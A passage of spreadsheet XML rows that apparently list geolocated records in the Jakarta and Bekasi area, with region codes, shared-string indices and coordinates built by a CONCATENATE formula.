      <c r="R1343" t="s">
        <v>114</v>
      </c>
      <c r="S1343" t="s">
        <v>41</v>
      </c>
      <c r="T1343" t="s">
        <v>42</v>
      </c>
      <c r="U1343" s="5">
        <v>10696336</v>
      </c>
      <c r="V1343" s="5" t="s">
        <v>15700</v>
      </c>
      <c r="W1343" s="5">
        <v>-621241</v>
      </c>
      <c r="X1343" t="s">
        <v>19473</v>
      </c>
      <c r="Y1343" t="str">
        <f t="shared" si="20"/>
        <v>-6.21241,106.96336</v>
      </c>
    </row>
    <row r="1344" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1344">
        <v>108916</v>
      </c>
      <c r="B1344" s="1">
        <v>43885</v>
      </c>
      <c r="C1344">
        <v>1</v>
      </c>
      <c r="D1344" t="s">
        <v>22</v>
      </c>
      <c r="E1344" t="s">
        <v>23</v>
      </c>
      <c r="F1344" s="3" t="s">
        <v>4860</v>
      </c>
      <c r="G1344" t="s">
        <v>4861</v>
      </c>
      <c r="H1344" t="s">
        <v>26</v>
      </c>
      <c r="I1344" t="s">
        <v>974</v>
      </c>
      <c r="J1344" t="s">
        <v>2627</v>
      </c>
      <c r="L1344" t="s">
        <v>4862</v>
      </c>
      <c r="M1344">
        <v>3275050007</v>
      </c>
      <c r="N1344">
        <v>3275050</v>
      </c>
      <c r="O1344">
        <v>3275</v>
      </c>
      <c r="P1344">
        <v>32</v>
      </c>
      <c r="Q1344" t="s">
        <v>954</v>
      </c>
      <c r="R1344" t="s">
        <v>955</v>
      </c>
      <c r="S1344" t="s">
        <v>41</v>
      </c>
      <c r="T1344" t="s">
        <v>42</v>
      </c>
      <c r="U1344" s="5">
        <v>10698732</v>
      </c>
      <c r="V1344" s="5" t="s">
        <v>15701</v>
      </c>
      <c r="W1344" s="5">
        <v>-623583</v>
      </c>
      <c r="X1344" t="s">
        <v>19474</v>
      </c>
      <c r="Y1344" t="str">
        <f t="shared" si="20"/>
        <v>-6.23583,106.98732</v>
      </c>
    </row>
    <row r="1345" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1345">
        <v>108917</v>
      </c>
      <c r="B1345" s="1">
        <v>43885</v>
      </c>
      <c r="C1345">
        <v>1</v>
      </c>
      <c r="D1345" t="s">
        <v>22</v>
      </c>
      <c r="E1345" t="s">
        <v>23</v>
      </c>
      <c r="F1345" t="s">
        <v>4863</v>
      </c>
      <c r="G1345" t="s">
        <v>4864</v>
      </c>
      <c r="H1345" t="s">
        <v>26</v>
      </c>
      <c r="I1345" t="s">
        <v>27</v>
      </c>
      <c r="J1345" t="s">
        <v>2782</v>
      </c>
      <c r="L1345" t="s">
        <v>4865</v>
      </c>
      <c r="M1345">
        <v>3175030002</v>
      </c>
      <c r="N1345">
        <v>3175030</v>
      </c>
      <c r="O1345">
        <v>3175</v>
      </c>
      <c r="P1345">
        <v>31</v>
      </c>
      <c r="Q1345" t="s">
        <v>1592</v>
      </c>
      <c r="R1345" t="s">
        <v>1563</v>
      </c>
      <c r="S1345" t="s">
        <v>547</v>
      </c>
      <c r="T1345" t="s">
        <v>33</v>
      </c>
      <c r="U1345" s="5">
        <v>10687277</v>
      </c>
      <c r="V1345" s="5" t="s">
        <v>15702</v>
      </c>
      <c r="W1345" s="5">
        <v>-615441</v>
      </c>
      <c r="X1345" t="s">
        <v>19475</v>
      </c>
      <c r="Y1345" t="str">
        <f t="shared" si="20"/>
        <v>-6.15441,106.87277</v>
      </c>
    </row>
    <row r="1346" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1346">
        <v>108918</v>
      </c>
      <c r="B1346" s="1">
        <v>43885</v>
      </c>
      <c r="C1346">
        <v>1</v>
      </c>
      <c r="D1346" t="s">
        <v>22</v>
      </c>
      <c r="E1346" t="s">
        <v>23</v>
      </c>
      <c r="F1346" t="s">
        <v>4866</v>
      </c>
      <c r="G1346" t="s">
        <v>4867</v>
      </c>
      <c r="H1346" t="s">
        <v>26</v>
      </c>
      <c r="I1346" t="s">
        <v>3275</v>
      </c>
      <c r="J1346" t="s">
        <v>2627</v>
      </c>
      <c r="L1346" t="s">
        <v>4868</v>
      </c>
      <c r="M1346">
        <v>3275040007</v>
      </c>
      <c r="N1346">
        <v>3275040</v>
      </c>
      <c r="O1346">
        <v>3275</v>
      </c>
      <c r="P1346">
        <v>32</v>
      </c>
      <c r="Q1346" t="s">
        <v>99</v>
      </c>
      <c r="R1346" t="s">
        <v>100</v>
      </c>
      <c r="S1346" t="s">
        <v>41</v>
      </c>
      <c r="T1346" t="s">
        <v>42</v>
      </c>
      <c r="U1346" s="5">
        <v>10702791</v>
      </c>
      <c r="V1346" s="5" t="s">
        <v>15703</v>
      </c>
      <c r="W1346" s="5">
        <v>-623642</v>
      </c>
      <c r="X1346" t="s">
        <v>19476</v>
      </c>
      <c r="Y1346" t="str">
        <f t="shared" si="20"/>
        <v>-6.23642,107.02791</v>
      </c>
    </row>
    <row r="1347" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1347">
        <v>108919</v>
      </c>
      <c r="B1347" s="1">
        <v>43885</v>
      </c>
      <c r="C1347">
        <v>1</v>
      </c>
      <c r="D1347" t="s">
        <v>22</v>
      </c>
      <c r="E1347" t="s">
        <v>23</v>
      </c>
      <c r="F1347" t="s">
        <v>4869</v>
      </c>
      <c r="G1347" t="s">
        <v>4870</v>
      </c>
      <c r="H1347" t="s">
        <v>26</v>
      </c>
      <c r="I1347" t="s">
        <v>2196</v>
      </c>
      <c r="J1347" t="s">
        <v>4871</v>
      </c>
      <c r="L1347" t="s">
        <v>4872</v>
      </c>
      <c r="M1347">
        <v>3173010007</v>
      </c>
      <c r="N1347">
        <v>3173010</v>
      </c>
      <c r="O1347">
        <v>3173</v>
      </c>
      <c r="P1347">
        <v>31</v>
      </c>
      <c r="Q1347" t="s">
        <v>1510</v>
      </c>
      <c r="R1347" t="s">
        <v>1481</v>
      </c>
      <c r="S1347" t="s">
        <v>62</v>
      </c>
      <c r="T1347" t="s">
        <v>33</v>
      </c>
      <c r="U1347" s="5">
        <v>10682115</v>
      </c>
      <c r="V1347" s="5" t="s">
        <v>15704</v>
      </c>
      <c r="W1347" s="5">
        <v>-618437</v>
      </c>
      <c r="X1347" t="s">
        <v>19477</v>
      </c>
      <c r="Y1347" t="str">
        <f t="shared" ref="Y1347:Y1410" si="21">CONCATENATE(X1347,",",V1347)</f>
        <v>-6.18437,106.82115</v>
      </c>
    </row>
    <row r="1348" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1348">
        <v>108920</v>
      </c>
      <c r="B1348" s="1">
        <v>43885</v>
      </c>
      <c r="C1348">
        <v>1</v>
      </c>
      <c r="D1348" t="s">
        <v>22</v>
      </c>
      <c r="E1348" t="s">
        <v>23</v>
      </c>
      <c r="F1348" t="s">
        <v>4873</v>
      </c>
      <c r="G1348" t="s">
        <v>4874</v>
      </c>
      <c r="H1348" t="s">
        <v>26</v>
      </c>
      <c r="I1348" t="s">
        <v>4261</v>
      </c>
      <c r="J1348" t="s">
        <v>4292</v>
      </c>
      <c r="L1348" t="s">
        <v>4875</v>
      </c>
      <c r="M1348">
        <v>3172070007</v>
      </c>
      <c r="N1348">
        <v>3172070</v>
      </c>
      <c r="O1348">
        <v>3172</v>
      </c>
      <c r="P1348">
        <v>31</v>
      </c>
      <c r="Q1348" t="s">
        <v>3186</v>
      </c>
      <c r="R1348" t="s">
        <v>128</v>
      </c>
      <c r="S1348" t="s">
        <v>49</v>
      </c>
      <c r="T1348" t="s">
        <v>33</v>
      </c>
      <c r="U1348" s="5">
        <v>10690616</v>
      </c>
      <c r="V1348" s="5" t="s">
        <v>15705</v>
      </c>
      <c r="W1348" s="5">
        <v>-622115</v>
      </c>
      <c r="X1348" t="s">
        <v>19478</v>
      </c>
      <c r="Y1348" t="str">
        <f t="shared" si="21"/>
        <v>-6.22115,106.90616</v>
      </c>
    </row>
    <row r="1349" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1349">
        <v>108921</v>
      </c>
      <c r="B1349" s="1">
        <v>43885</v>
      </c>
      <c r="C1349">
        <v>1</v>
      </c>
      <c r="D1349" t="s">
        <v>22</v>
      </c>
      <c r="E1349" t="s">
        <v>23</v>
      </c>
      <c r="F1349" t="s">
        <v>4876</v>
      </c>
      <c r="G1349" t="s">
        <v>4877</v>
      </c>
      <c r="H1349" t="s">
        <v>26</v>
      </c>
      <c r="I1349" t="s">
        <v>882</v>
      </c>
      <c r="J1349" t="s">
        <v>1634</v>
      </c>
      <c r="L1349" t="s">
        <v>4878</v>
      </c>
      <c r="M1349">
        <v>3174070004</v>
      </c>
      <c r="N1349">
        <v>3174070</v>
      </c>
      <c r="O1349">
        <v>3174</v>
      </c>
      <c r="P1349">
        <v>31</v>
      </c>
      <c r="Q1349" t="s">
        <v>926</v>
      </c>
      <c r="R1349" t="s">
        <v>84</v>
      </c>
      <c r="S1349" t="s">
        <v>32</v>
      </c>
      <c r="T1349" t="s">
        <v>33</v>
      </c>
      <c r="U1349" s="5">
        <v>10674707</v>
      </c>
      <c r="V1349" s="5" t="s">
        <v>15706</v>
      </c>
      <c r="W1349" s="5">
        <v>-614198</v>
      </c>
      <c r="X1349" t="s">
        <v>19479</v>
      </c>
      <c r="Y1349" t="str">
        <f t="shared" si="21"/>
        <v>-6.14198,106.74707</v>
      </c>
    </row>
    <row r="1350" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1350">
        <v>108922</v>
      </c>
      <c r="B1350" s="1">
        <v>43885</v>
      </c>
      <c r="C1350">
        <v>1</v>
      </c>
      <c r="D1350" t="s">
        <v>22</v>
      </c>
      <c r="E1350" t="s">
        <v>23</v>
      </c>
      <c r="F1350" t="s">
        <v>4879</v>
      </c>
      <c r="H1350" t="s">
        <v>26</v>
      </c>
      <c r="I1350" t="s">
        <v>523</v>
      </c>
      <c r="J1350" t="s">
        <v>4119</v>
      </c>
      <c r="L1350" t="s">
        <v>4880</v>
      </c>
      <c r="M1350">
        <v>3172080001</v>
      </c>
      <c r="N1350">
        <v>3172080</v>
      </c>
      <c r="O1350">
        <v>3172</v>
      </c>
      <c r="P1350">
        <v>31</v>
      </c>
      <c r="Q1350" t="s">
        <v>48</v>
      </c>
      <c r="R1350" t="s">
        <v>141</v>
      </c>
      <c r="S1350" t="s">
        <v>49</v>
      </c>
      <c r="T1350" t="s">
        <v>33</v>
      </c>
      <c r="U1350" s="5">
        <v>10691765</v>
      </c>
      <c r="V1350" s="5" t="s">
        <v>15707</v>
      </c>
      <c r="W1350" s="5">
        <v>-620257</v>
      </c>
      <c r="X1350" t="s">
        <v>19480</v>
      </c>
      <c r="Y1350" t="str">
        <f t="shared" si="21"/>
        <v>-6.20257,106.91765</v>
      </c>
    </row>
    <row r="1351" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1351">
        <v>108923</v>
      </c>
      <c r="B1351" s="1">
        <v>43885</v>
      </c>
      <c r="C1351">
        <v>1</v>
      </c>
      <c r="D1351" t="s">
        <v>22</v>
      </c>
      <c r="E1351" t="s">
        <v>23</v>
      </c>
      <c r="F1351" t="s">
        <v>4881</v>
      </c>
      <c r="G1351" t="s">
        <v>4882</v>
      </c>
      <c r="H1351" t="s">
        <v>26</v>
      </c>
      <c r="I1351" t="s">
        <v>1359</v>
      </c>
      <c r="J1351" t="s">
        <v>4414</v>
      </c>
      <c r="L1351" t="s">
        <v>4883</v>
      </c>
      <c r="M1351">
        <v>3173070002</v>
      </c>
      <c r="N1351">
        <v>3173070</v>
      </c>
      <c r="O1351">
        <v>3173</v>
      </c>
      <c r="P1351">
        <v>31</v>
      </c>
      <c r="Q1351" t="s">
        <v>2710</v>
      </c>
      <c r="R1351" t="s">
        <v>323</v>
      </c>
      <c r="S1351" t="s">
        <v>62</v>
      </c>
      <c r="T1351" t="s">
        <v>33</v>
      </c>
      <c r="U1351" s="5">
        <v>10684056</v>
      </c>
      <c r="V1351" s="5" t="s">
        <v>15708</v>
      </c>
      <c r="W1351" s="5">
        <v>-615144</v>
      </c>
      <c r="X1351" t="s">
        <v>19481</v>
      </c>
      <c r="Y1351" t="str">
        <f t="shared" si="21"/>
        <v>-6.15144,106.84056</v>
      </c>
    </row>
    <row r="1352" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1352">
        <v>108924</v>
      </c>
      <c r="B1352" s="1">
        <v>43885</v>
      </c>
      <c r="C1352">
        <v>1</v>
      </c>
      <c r="D1352" t="s">
        <v>22</v>
      </c>
      <c r="E1352" t="s">
        <v>23</v>
      </c>
      <c r="F1352" s="3" t="s">
        <v>4884</v>
      </c>
      <c r="G1352" t="s">
        <v>4885</v>
      </c>
      <c r="H1352" t="s">
        <v>26</v>
      </c>
      <c r="I1352" t="s">
        <v>555</v>
      </c>
      <c r="J1352" t="s">
        <v>2627</v>
      </c>
      <c r="L1352" t="s">
        <v>4886</v>
      </c>
      <c r="M1352">
        <v>3275010012</v>
      </c>
      <c r="N1352">
        <v>3275010</v>
      </c>
      <c r="O1352">
        <v>3275</v>
      </c>
      <c r="P1352">
        <v>32</v>
      </c>
      <c r="Q1352" t="s">
        <v>2322</v>
      </c>
      <c r="R1352" t="s">
        <v>287</v>
      </c>
      <c r="S1352" t="s">
        <v>41</v>
      </c>
      <c r="T1352" t="s">
        <v>42</v>
      </c>
      <c r="U1352" s="5">
        <v>10693819</v>
      </c>
      <c r="V1352" s="5" t="s">
        <v>15709</v>
      </c>
      <c r="W1352" s="5">
        <v>-626289</v>
      </c>
      <c r="X1352" t="s">
        <v>19482</v>
      </c>
      <c r="Y1352" t="str">
        <f t="shared" si="21"/>
        <v>-6.26289,106.93819</v>
      </c>
    </row>
    <row r="1353" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1353">
        <v>108925</v>
      </c>
      <c r="B1353" s="1">
        <v>43885</v>
      </c>
      <c r="C1353">
        <v>1</v>
      </c>
      <c r="D1353" t="s">
        <v>22</v>
      </c>
      <c r="E1353" t="s">
        <v>23</v>
      </c>
      <c r="F1353" t="s">
        <v>4887</v>
      </c>
      <c r="G1353" t="s">
        <v>4888</v>
      </c>
      <c r="H1353" t="s">
        <v>26</v>
      </c>
      <c r="I1353" t="s">
        <v>882</v>
      </c>
      <c r="J1353" t="s">
        <v>4889</v>
      </c>
      <c r="L1353" t="s">
        <v>4890</v>
      </c>
      <c r="M1353">
        <v>3174050011</v>
      </c>
      <c r="N1353">
        <v>3174050</v>
      </c>
      <c r="O1353">
        <v>3174</v>
      </c>
      <c r="P1353">
        <v>31</v>
      </c>
      <c r="Q1353" t="s">
        <v>4891</v>
      </c>
      <c r="R1353" t="s">
        <v>2826</v>
      </c>
      <c r="S1353" t="s">
        <v>32</v>
      </c>
      <c r="T1353" t="s">
        <v>33</v>
      </c>
      <c r="U1353" s="5">
        <v>10680305</v>
      </c>
      <c r="V1353" s="5" t="s">
        <v>15710</v>
      </c>
      <c r="W1353" s="5">
        <v>-613289</v>
      </c>
      <c r="X1353" t="s">
        <v>19483</v>
      </c>
      <c r="Y1353" t="str">
        <f t="shared" si="21"/>
        <v>-6.13289,106.80305</v>
      </c>
    </row>
    <row r="1354" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1354">
        <v>108926</v>
      </c>
      <c r="B1354" s="1">
        <v>43885</v>
      </c>
      <c r="C1354">
        <v>1</v>
      </c>
      <c r="D1354" t="s">
        <v>22</v>
      </c>
      <c r="E1354" t="s">
        <v>23</v>
      </c>
      <c r="F1354" t="s">
        <v>4892</v>
      </c>
      <c r="H1354" t="s">
        <v>26</v>
      </c>
      <c r="I1354" t="s">
        <v>3577</v>
      </c>
      <c r="J1354" t="s">
        <v>2627</v>
      </c>
      <c r="L1354" t="s">
        <v>4893</v>
      </c>
      <c r="M1354">
        <v>3275040008</v>
      </c>
      <c r="N1354">
        <v>3275040</v>
      </c>
      <c r="O1354">
        <v>3275</v>
      </c>
      <c r="P1354">
        <v>32</v>
      </c>
      <c r="Q1354" t="s">
        <v>2814</v>
      </c>
      <c r="R1354" t="s">
        <v>100</v>
      </c>
      <c r="S1354" t="s">
        <v>41</v>
      </c>
      <c r="T1354" t="s">
        <v>42</v>
      </c>
      <c r="U1354" s="5">
        <v>10703640</v>
      </c>
      <c r="V1354" s="5" t="s">
        <v>15711</v>
      </c>
      <c r="W1354" s="5">
        <v>-624274</v>
      </c>
      <c r="X1354" t="s">
        <v>19484</v>
      </c>
      <c r="Y1354" t="str">
        <f t="shared" si="21"/>
        <v>-6.24274,107.03640</v>
      </c>
    </row>
    <row r="1355" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1355">
        <v>108927</v>
      </c>
      <c r="B1355" s="1">
        <v>43885</v>
      </c>
      <c r="C1355">
        <v>1</v>
      </c>
      <c r="D1355" t="s">
        <v>22</v>
      </c>
      <c r="E1355" t="s">
        <v>23</v>
      </c>
      <c r="F1355" t="s">
        <v>4894</v>
      </c>
      <c r="G1355" t="s">
        <v>4895</v>
      </c>
      <c r="H1355" t="s">
        <v>26</v>
      </c>
      <c r="I1355" t="s">
        <v>3029</v>
      </c>
      <c r="J1355" t="s">
        <v>3189</v>
      </c>
      <c r="L1355" t="s">
        <v>4896</v>
      </c>
      <c r="M1355">
        <v>3171090003</v>
      </c>
      <c r="N1355">
        <v>3171090</v>
      </c>
      <c r="O1355">
        <v>3171</v>
      </c>
      <c r="P1355">
        <v>31</v>
      </c>
      <c r="Q1355" t="s">
        <v>3154</v>
      </c>
      <c r="R1355" t="s">
        <v>347</v>
      </c>
      <c r="S1355" t="s">
        <v>108</v>
      </c>
      <c r="T1355" t="s">
        <v>33</v>
      </c>
      <c r="U1355" s="5">
        <v>10685225</v>
      </c>
      <c r="V1355" s="5" t="s">
        <v>15712</v>
      </c>
      <c r="W1355" s="5">
        <v>-622641</v>
      </c>
      <c r="X1355" t="s">
        <v>19485</v>
      </c>
      <c r="Y1355" t="str">
        <f t="shared" si="21"/>
        <v>-6.22641,106.85225</v>
      </c>
    </row>
    <row r="1356" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1356">
        <v>108928</v>
      </c>
      <c r="B1356" s="1">
        <v>43885</v>
      </c>
      <c r="C1356">
        <v>1</v>
      </c>
      <c r="D1356" t="s">
        <v>22</v>
      </c>
      <c r="E1356" t="s">
        <v>23</v>
      </c>
      <c r="F1356" t="s">
        <v>4897</v>
      </c>
      <c r="G1356" t="s">
        <v>4898</v>
      </c>
      <c r="H1356" t="s">
        <v>26</v>
      </c>
      <c r="I1356" t="s">
        <v>1201</v>
      </c>
      <c r="J1356" t="s">
        <v>4899</v>
      </c>
      <c r="L1356" t="s">
        <v>4900</v>
      </c>
      <c r="M1356">
        <v>3173070005</v>
      </c>
      <c r="N1356">
        <v>3173070</v>
      </c>
      <c r="O1356">
        <v>3173</v>
      </c>
      <c r="P1356">
        <v>31</v>
      </c>
      <c r="Q1356" t="s">
        <v>1578</v>
      </c>
      <c r="R1356" t="s">
        <v>323</v>
      </c>
      <c r="S1356" t="s">
        <v>62</v>
      </c>
      <c r="T1356" t="s">
        <v>33</v>
      </c>
      <c r="U1356" s="5">
        <v>10682590</v>
      </c>
      <c r="V1356" s="5" t="s">
        <v>15713</v>
      </c>
      <c r="W1356" s="5">
        <v>-613822</v>
      </c>
      <c r="X1356" t="s">
        <v>19486</v>
      </c>
      <c r="Y1356" t="str">
        <f t="shared" si="21"/>
        <v>-6.13822,106.82590</v>
      </c>
    </row>
    <row r="1357" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1357">
        <v>108929</v>
      </c>
      <c r="B1357" s="1">
        <v>43885</v>
      </c>
      <c r="C1357">
        <v>1</v>
      </c>
      <c r="D1357" t="s">
        <v>22</v>
      </c>
      <c r="E1357" t="s">
        <v>23</v>
      </c>
      <c r="F1357" t="s">
        <v>4901</v>
      </c>
      <c r="G1357" t="s">
        <v>4902</v>
      </c>
      <c r="H1357" t="s">
        <v>26</v>
      </c>
      <c r="I1357" t="s">
        <v>65</v>
      </c>
      <c r="J1357" t="s">
        <v>3259</v>
      </c>
      <c r="L1357" t="s">
        <v>4903</v>
      </c>
      <c r="M1357">
        <v>3172100005</v>
      </c>
      <c r="N1357">
        <v>3172100</v>
      </c>
      <c r="O1357">
        <v>3172</v>
      </c>
      <c r="P1357">
        <v>31</v>
      </c>
      <c r="Q1357" t="s">
        <v>1773</v>
      </c>
      <c r="R1357" t="s">
        <v>1436</v>
      </c>
      <c r="S1357" t="s">
        <v>49</v>
      </c>
      <c r="T1357" t="s">
        <v>33</v>
      </c>
      <c r="U1357" s="5">
        <v>10687072</v>
      </c>
      <c r="V1357" s="5" t="s">
        <v>15714</v>
      </c>
      <c r="W1357" s="5">
        <v>-619820</v>
      </c>
      <c r="X1357" t="s">
        <v>19487</v>
      </c>
      <c r="Y1357" t="str">
        <f t="shared" si="21"/>
        <v>-6.19820,106.87072</v>
      </c>
    </row>
    <row r="1358" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1358">
        <v>108930</v>
      </c>
      <c r="B1358" s="1">
        <v>43885</v>
      </c>
      <c r="C1358">
        <v>1</v>
      </c>
      <c r="D1358" t="s">
        <v>22</v>
      </c>
      <c r="E1358" t="s">
        <v>23</v>
      </c>
      <c r="F1358" t="s">
        <v>4904</v>
      </c>
      <c r="G1358" t="s">
        <v>4905</v>
      </c>
      <c r="H1358" t="s">
        <v>26</v>
      </c>
      <c r="I1358" t="s">
        <v>65</v>
      </c>
      <c r="J1358" t="s">
        <v>4906</v>
      </c>
      <c r="L1358" t="s">
        <v>4907</v>
      </c>
      <c r="M1358">
        <v>3173010002</v>
      </c>
      <c r="N1358">
        <v>3173010</v>
      </c>
      <c r="O1358">
        <v>3173</v>
      </c>
      <c r="P1358">
        <v>31</v>
      </c>
      <c r="Q1358" t="s">
        <v>4908</v>
      </c>
      <c r="R1358" t="s">
        <v>1481</v>
      </c>
      <c r="S1358" t="s">
        <v>62</v>
      </c>
      <c r="T1358" t="s">
        <v>33</v>
      </c>
      <c r="U1358" s="5">
        <v>10681078</v>
      </c>
      <c r="V1358" s="5" t="s">
        <v>15715</v>
      </c>
      <c r="W1358" s="5">
        <v>-620820</v>
      </c>
      <c r="X1358" t="s">
        <v>19488</v>
      </c>
      <c r="Y1358" t="str">
        <f t="shared" si="21"/>
        <v>-6.20820,106.81078</v>
      </c>
    </row>
    <row r="1359" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1359">
        <v>108931</v>
      </c>
      <c r="B1359" s="1">
        <v>43885</v>
      </c>
      <c r="C1359">
        <v>1</v>
      </c>
      <c r="D1359" t="s">
        <v>22</v>
      </c>
      <c r="E1359" t="s">
        <v>23</v>
      </c>
      <c r="F1359" t="s">
        <v>4909</v>
      </c>
      <c r="G1359" t="s">
        <v>4910</v>
      </c>
      <c r="H1359" t="s">
        <v>26</v>
      </c>
      <c r="I1359" t="s">
        <v>2165</v>
      </c>
      <c r="J1359" t="s">
        <v>4911</v>
      </c>
      <c r="L1359" t="s">
        <v>4912</v>
      </c>
      <c r="M1359">
        <v>3174040003</v>
      </c>
      <c r="N1359">
        <v>3174040</v>
      </c>
      <c r="O1359">
        <v>3174</v>
      </c>
      <c r="P1359">
        <v>31</v>
      </c>
      <c r="Q1359" t="s">
        <v>3011</v>
      </c>
      <c r="R1359" t="s">
        <v>377</v>
      </c>
      <c r="S1359" t="s">
        <v>32</v>
      </c>
      <c r="T1359" t="s">
        <v>33</v>
      </c>
      <c r="U1359" s="5">
        <v>10680110</v>
      </c>
      <c r="V1359" s="5" t="s">
        <v>15716</v>
      </c>
      <c r="W1359" s="5">
        <v>-617054</v>
      </c>
      <c r="X1359" t="s">
        <v>19489</v>
      </c>
      <c r="Y1359" t="str">
        <f t="shared" si="21"/>
        <v>-6.17054,106.80110</v>
      </c>
    </row>
    <row r="1360" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1360">
        <v>108932</v>
      </c>
      <c r="B1360" s="1">
        <v>43885</v>
      </c>
      <c r="C1360">
        <v>1</v>
      </c>
      <c r="D1360" t="s">
        <v>22</v>
      </c>
      <c r="E1360" t="s">
        <v>23</v>
      </c>
      <c r="F1360" t="s">
        <v>4913</v>
      </c>
      <c r="H1360" t="s">
        <v>26</v>
      </c>
      <c r="I1360" t="s">
        <v>1194</v>
      </c>
      <c r="J1360" t="s">
        <v>1576</v>
      </c>
      <c r="L1360" t="s">
        <v>4914</v>
      </c>
      <c r="M1360">
        <v>3173070005</v>
      </c>
      <c r="N1360">
        <v>3173070</v>
      </c>
      <c r="O1360">
        <v>3173</v>
      </c>
      <c r="P1360">
        <v>31</v>
      </c>
      <c r="Q1360" t="s">
        <v>1578</v>
      </c>
      <c r="R1360" t="s">
        <v>323</v>
      </c>
      <c r="S1360" t="s">
        <v>62</v>
      </c>
      <c r="T1360" t="s">
        <v>33</v>
      </c>
      <c r="U1360" s="5">
        <v>10682764</v>
      </c>
      <c r="V1360" s="5" t="s">
        <v>15717</v>
      </c>
      <c r="W1360" s="5">
        <v>-613665</v>
      </c>
      <c r="X1360" t="s">
        <v>19490</v>
      </c>
      <c r="Y1360" t="str">
        <f t="shared" si="21"/>
        <v>-6.13665,106.82764</v>
      </c>
    </row>
    <row r="1361" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1361">
        <v>108933</v>
      </c>
      <c r="B1361" s="1">
        <v>43885</v>
      </c>
      <c r="C1361">
        <v>1</v>
      </c>
      <c r="D1361" t="s">
        <v>22</v>
      </c>
      <c r="E1361" t="s">
        <v>23</v>
      </c>
      <c r="F1361" t="s">
        <v>4915</v>
      </c>
      <c r="G1361" t="s">
        <v>4916</v>
      </c>
      <c r="H1361" t="s">
        <v>26</v>
      </c>
      <c r="I1361" t="s">
        <v>843</v>
      </c>
      <c r="J1361" t="s">
        <v>4162</v>
      </c>
      <c r="L1361" t="s">
        <v>4917</v>
      </c>
      <c r="M1361">
        <v>3172040005</v>
      </c>
      <c r="N1361">
        <v>3172040</v>
      </c>
      <c r="O1361">
        <v>3172</v>
      </c>
      <c r="P1361">
        <v>31</v>
      </c>
      <c r="Q1361" t="s">
        <v>1351</v>
      </c>
      <c r="R1361" t="s">
        <v>281</v>
      </c>
      <c r="S1361" t="s">
        <v>49</v>
      </c>
      <c r="T1361" t="s">
        <v>33</v>
      </c>
      <c r="U1361" s="5">
        <v>10690248</v>
      </c>
      <c r="V1361" s="5" t="s">
        <v>15718</v>
      </c>
      <c r="W1361" s="5">
        <v>-624901</v>
      </c>
      <c r="X1361" t="s">
        <v>19491</v>
      </c>
      <c r="Y1361" t="str">
        <f t="shared" si="21"/>
        <v>-6.24901,106.90248</v>
      </c>
    </row>
    <row r="1362" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1362">
        <v>108934</v>
      </c>
      <c r="B1362" s="1">
        <v>43885</v>
      </c>
      <c r="C1362">
        <v>1</v>
      </c>
      <c r="D1362" t="s">
        <v>22</v>
      </c>
      <c r="E1362" t="s">
        <v>23</v>
      </c>
      <c r="F1362" t="s">
        <v>4918</v>
      </c>
      <c r="H1362" t="s">
        <v>26</v>
      </c>
      <c r="I1362" t="s">
        <v>332</v>
      </c>
      <c r="J1362" t="s">
        <v>4919</v>
      </c>
      <c r="L1362" t="s">
        <v>4920</v>
      </c>
      <c r="M1362">
        <v>3171100008</v>
      </c>
      <c r="N1362">
        <v>3171100</v>
      </c>
      <c r="O1362">
        <v>3171</v>
      </c>
      <c r="P1362">
        <v>31</v>
      </c>
      <c r="Q1362" t="s">
        <v>107</v>
      </c>
      <c r="R1362" t="s">
        <v>107</v>
      </c>
      <c r="S1362" t="s">
        <v>108</v>
      </c>
      <c r="T1362" t="s">
        <v>33</v>
      </c>
      <c r="U1362" s="5">
        <v>10682436</v>
      </c>
      <c r="V1362" s="5" t="s">
        <v>15719</v>
      </c>
      <c r="W1362" s="5">
        <v>-620344</v>
      </c>
      <c r="X1362" t="s">
        <v>19492</v>
      </c>
      <c r="Y1362" t="str">
        <f t="shared" si="21"/>
        <v>-6.20344,106.82436</v>
      </c>
    </row>
    <row r="1363" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1363">
        <v>108935</v>
      </c>
      <c r="B1363" s="1">
        <v>43885</v>
      </c>
      <c r="C1363">
        <v>1</v>
      </c>
      <c r="D1363" t="s">
        <v>22</v>
      </c>
      <c r="E1363" t="s">
        <v>23</v>
      </c>
      <c r="F1363" t="s">
        <v>4921</v>
      </c>
      <c r="G1363" t="s">
        <v>4922</v>
      </c>
      <c r="H1363" t="s">
        <v>26</v>
      </c>
      <c r="I1363" t="s">
        <v>1633</v>
      </c>
      <c r="J1363" t="s">
        <v>2857</v>
      </c>
      <c r="L1363" t="s">
        <v>4923</v>
      </c>
      <c r="M1363">
        <v>3175060001</v>
      </c>
      <c r="N1363">
        <v>3175060</v>
      </c>
      <c r="O1363">
        <v>3175</v>
      </c>
      <c r="P1363">
        <v>31</v>
      </c>
      <c r="Q1363" t="s">
        <v>2278</v>
      </c>
      <c r="R1363" t="s">
        <v>2279</v>
      </c>
      <c r="S1363" t="s">
        <v>547</v>
      </c>
      <c r="T1363" t="s">
        <v>33</v>
      </c>
      <c r="U1363" s="5">
        <v>10692281</v>
      </c>
      <c r="V1363" s="5" t="s">
        <v>15720</v>
      </c>
      <c r="W1363" s="5">
        <v>-614644</v>
      </c>
      <c r="X1363" t="s">
        <v>19493</v>
      </c>
      <c r="Y1363" t="str">
        <f t="shared" si="21"/>
        <v>-6.14644,106.92281</v>
      </c>
    </row>
    <row r="1364" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1364">
        <v>108936</v>
      </c>
      <c r="B1364" s="1">
        <v>43885</v>
      </c>
      <c r="C1364">
        <v>1</v>
      </c>
      <c r="D1364" t="s">
        <v>22</v>
      </c>
